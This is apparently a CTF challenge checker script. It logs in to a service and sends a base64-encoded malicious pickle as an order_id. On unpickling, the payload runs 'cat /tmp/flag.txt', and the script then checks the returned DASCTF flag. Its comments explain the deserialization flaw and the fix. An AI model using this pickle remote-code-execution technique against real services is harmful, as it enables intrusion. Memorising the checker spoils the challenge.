#!/usr/bin/python
# -*- coding: utf-8 -*-
import re, sys, requests, pickle, base64, subprocess

# Checker arguments, taken positionally from the command line:
#   HOST, PORT - address of the challenge instance, passed to exp() below
#   FLAG       - the flag value the extracted result is compared against
# This runs at import time. The tuple unpack raises ValueError unless at
# least three arguments were supplied; all three values stay strings.
HOST, PORT, FLAG = sys.argv[1:4]

class RCE:
    """Marker object whose pickled form is a call to ``subprocess.check_output``.

    ``pickle`` serializes an object by recording the ``(callable, args)`` pair
    returned from ``__reduce__``; on load, the unpickler calls that callable
    with those arguments to "rebuild" the object. Nothing in the format limits
    which callable is named, which is why ``pickle.loads`` on data a client can
    influence amounts to running code chosen by that client.
    """

    def __reduce__(self):
        """Return the (callable, args) pair that pickle will record."""
        from subprocess import check_output

        # Fixed argv list (no shell): print the challenge flag file.
        command = ["cat", "/tmp/flag.txt"]
        return (check_output, (command,))

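def exp(ip, port):
    """Run the checker's proof-of-concept against one challenge instance.

    Registers and logs in with a fixed throwaway account, then requests
    ``/view_order`` with an ``order_id`` that is the base64 encoding of a
    pickled dict containing an ``RCE`` instance. The response body is searched
    for a ``DASCTF{...}`` token.

    NOTE(review): the service code is not shown here; the check presumably
    works because the service base64-decodes ``order_id`` and passes it to
    ``pickle.loads``, then echoes the resulting ``user`` field (CWE-502,
    deserialization of untrusted data). The service-side fix is to stop
    unpickling client-supplied values: look orders up by an opaque server-side
    id, or carry state in a data-only format such as JSON with an integrity
    check.

    Args:
        ip: Host name or address of the instance.
        port: TCP port of the instance (string or int; interpolated into the URL).

    Returns:
        The first ``DASCTF{...}`` token found in the response, or ``None`` if
        the response contains none.

    Raises:
        requests.exceptions.RequestException: connection failures and timeouts
            propagate to the caller.
    """
    url = f"http://{ip}:{port}"
    creds = {"username": "exploit", "password": "exploit"}
    # requests has no default timeout; bound every call so a dead or stalled
    # instance fails the check instead of hanging the checker indefinitely.
    timeout = 10

    # The context manager releases the session's pooled connections.
    with requests.Session() as s:
        # Register/login responses are deliberately not checked: on a re-run
        # the account may already exist and registration can legitimately fail.
        s.post(f"{url}/register", data=creds, timeout=timeout)
        s.post(f"{url}/login", data=creds, timeout=timeout)

        malicious_order = {'amount': '100', 'user': RCE()}
        payload = pickle.dumps(malicious_order)
        order_id = base64.b64encode(payload).decode()

        response = s.get(
            f"{url}/view_order",
            params={"order_id": order_id},
            timeout=timeout,
        )

    # Non-greedy match so only the first complete token is returned.
    flag_match = re.search(r'DASCTF\{.*?\}', response.text)
    return flag_match.group(0) if flag_match else None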

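if __name__ == '__main__':
    # Checker entry point: run the proof-of-concept against HOST:PORT and
    # compare what comes back with the flag the instance is expected to hold.
    result = exp(HOST, PORT)
    print(f"Extracted flag: {result}")
    print(f"Expected flag: {FLAG}")
    # Explicit comparison rather than `assert`: assert statements are removed
    # under `python -O`, which would let a failed check print "Pass!" and
    # exit 0. sys.exit with a message writes it to stderr and exits with 1.
    if result != FLAG:
        sys.exit("Fail: extracted flag does not match the expected flag")
    print("Pass!")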